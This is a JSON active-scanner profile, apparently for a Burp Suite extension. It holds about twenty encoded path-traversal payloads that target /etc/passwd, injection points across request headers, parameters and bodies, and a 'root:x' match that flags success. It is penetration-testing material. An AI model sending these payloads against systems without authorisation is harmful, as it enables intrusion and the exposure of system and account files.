[
  {
    "profile_name": "Path_Traversal_linux",
    "enabled": true,
    "scanner": "active",
    "author": "@bountysecurity",
    "steps": [
      {
        "request_type": "original",
        "reuse_cookie": false,
        "insertion_point": "same",
        "raw_request": "",
        "payloads": [
          "true,/../../../../../../../../../../../../../../../../etc/passwd",
          "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd",
          "true,../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00",
          "true,/etc/passwd%00",
          "true,.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./.\\\\./etc/passwd",
          "true,/../../../../../../../../../../../etc/passwd%00.html",
          "true,/../../../../../../../../../../../etc/passwd%00.jpg",
          "true,../../../../../../etc/passwd\u0026\u003d%3C%3C%3C%3C",
          "true,....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/....\\/etc/passwd",
          "true,....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd",
          "true,Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA\u003d\u003d",
          "true,Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA\u003d\u003d",
          "true,/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd",
          "true,/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
          "true,/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
          "true,..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd",
          "true,%00../../../../../../etc/passwd",
          "true,%00/etc/passwd%00",
          "true,..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd",
          "true,..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/..;/etc/passwd%00."
        ],
        "payloads_file": "",
        "payload_position": "replace",
        "change_http_request": false,
        "change_http_request_type": "post_to_get",
        "insertion_points": [
          "extension_provice",
          "user_agent",
          "entire_body",
          "param_body",
          "param_cookie",
          "param_json",
          "url_path_folder",
          "param_multipart_attr",
          "param_name_body",
          "param_name_url",
          "user_provided",
          "param_url",
          "param_xml",
          "param_xml_attr",
          "url_path_filename",
          "param_name_cookie",
          "param_name_xml",
          "param_name_xml_attr",
          "param_name_multi_part_attr",
          "param_name_json",
          "referer",
          "origin",
          "entire_body_xml",
          "entire_body_json",
          "entire_body_multipart"
        ],
        "header_value": false,
        "new_headers": [],
        "match_replace": [],
        "encoder": [],
        "url_encode": false,
        "chars_to_url_encode": "",
        "greps_file": "",
        "grep": [
          "true,,Simple String,,root:x"
        ],
        "redir_type": "always",
        "max_redir": 5,
        "show_alert": "always",
        "issue_name": "Path_Traversal_linux",
        "issue_severity": "High",
        "issue_confidence": "Certain",
        "issue_detail": "",
        "remediation_detail": "",
        "issue_background": "",
        "remediation_background": ""
      }
    ],
    "Tags": [
      "Path_Traversal",
      "All"
    ]
  }
]